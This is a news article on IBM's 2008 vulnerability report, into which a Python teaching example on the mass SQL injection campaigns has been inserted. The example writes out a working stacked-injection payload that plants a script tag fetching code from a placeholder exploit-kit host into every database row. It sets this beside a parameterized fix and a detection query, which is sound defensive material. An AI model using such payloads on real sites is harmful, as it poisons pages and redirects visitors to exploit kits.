Changing How Threat Levels Are Judged
The idea of changing how the threat level of vulnerabilities is judged is not new. Microsoft, for example, altered its Patch Tuesday process last fall to include a new exploitability index as well as more information about the vulnerabilities being patched.

Overall, 2008 was a busy year for vulnerability researchers. According to the IBM report, there was a 13.5 percent increase in the number of bugs discovered when compared with 2007. By the end of last year, 53 percent of all vulnerabilities disclosed during the year had no vendor-supplied patches, the report states. In addition, 44 percent of bugs from 2007 and 46 percent of vulnerabilities from 2006 still hadn't been fixed.

In addition to focusing on the browser and ActiveX controls, hackers were also found to be turning their attention to new types of exploits that target Adobe Flash as well as PDF files and other documents. The large-scale, automated SQL injection attacks that emerged in early 2008 continued unabated throughout the year. By the end of 2008, the volume of attacks had jumped to 30 times the number initially seen that summer. "The purpose of these automated attacks is to deceive and redirect Web surfers to Web browser exploit tool kits," Lamb said. "This is one of the oldest forms of mass attack still in existence today. It is staggering that we still see SQL injection attacks in widespread use without adequate patching almost 10 years after they were first disclosed. Cyber-criminals target businesses because they provide an easy target to launch attacks against anyone that visits the Web."
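The mass SQL injection campaigns described above worked by appending a stacked UPDATE to a concatenated query so that every stored page gained a script tag pointing at the attacker's exploit kit. The following is an added example, not code from the article or from IBM's report, that shows the vulnerable pattern beside its parameterized fix and a simple check a site owner can run afterwards. The table, sample rows, payload and the exploit-kit URL are all constructed for illustration; Python's sqlite3 refuses stacked statements in execute(), so the vulnerable function splits on ';' to emulate a database driver that runs whatever the attacker appends.

```python
import sqlite3

# Constructed payload: the script URL is a placeholder, not a real exploit-kit host.
REDIRECT_TAG = '<script src="http://exploit-kit.example/x.js"></script>'
PAYLOAD = "zzz%'; UPDATE articles SET body = body || '" + REDIRECT_TAG + "' WHERE '1' LIKE '1"


def setup_db():
    """In-memory stand-in for a site's content database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Patch Tuesday", "Microsoft now publishes an exploitability index."),
         ("Browser plug-ins", "ActiveX, Flash and PDF readers drew most exploits.")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Builds the query by string concatenation, the defect behind the 2008 mass attacks.
    sqlite3.execute() rejects stacked statements, so the loop splits on ';' to emulate a
    driver (SQL Server's, for instance) that executes everything the attacker appends.
    The split is a toy and would break on a ';' inside a string literal."""
    sql = "SELECT id, title FROM articles WHERE title LIKE '%" + term + "%'"
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            fetched = conn.execute(stmt).fetchall()
            rows = fetched or rows  # keep the SELECT's rows; UPDATE yields none
    conn.commit()
    return rows


def search_safe(conn, term):
    """Parameterized query: the term is bound as data, so quotes and ';' inside it
    never reach the SQL parser as syntax."""
    return conn.execute(
        "SELECT id, title FROM articles WHERE title LIKE ?", ("%" + term + "%",)
    ).fetchall()


def tainted_rows(conn):
    """Post-incident check: how many stored pages now carry an injected <script> tag?"""
    return conn.execute(
        "SELECT COUNT(*) FROM articles WHERE body LIKE '%<script%'"
    ).fetchone()[0]


def demo():
    """Run the same attacker input through both code paths and count poisoned pages."""
    vuln = setup_db()
    search_vulnerable(vuln, PAYLOAD)
    safe = setup_db()
    search_safe(safe, PAYLOAD)
    return tainted_rows(vuln), tainted_rows(safe)


if __name__ == "__main__":
    print(demo())  # (2, 0): every row poisoned via concatenation, none via binding
```

The payload closes the attacker-controlled LIKE literal, stacks an UPDATE that appends the tag to every row, and ends with a predicate shaped so the application's own trailing `%'` completes it rather than breaking it. The parameterized version receives the identical string and simply searches for it. The count query at the end is the kind of check worth running against any content table after a campaign like this, since the injected rows keep serving the redirect long after the original request is gone from the logs.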
The Web remains the biggest attack vector, with more than half of all vulnerabilities disclosed being related to Web applications. Of these, more than 74 percent had no patch, according to the report.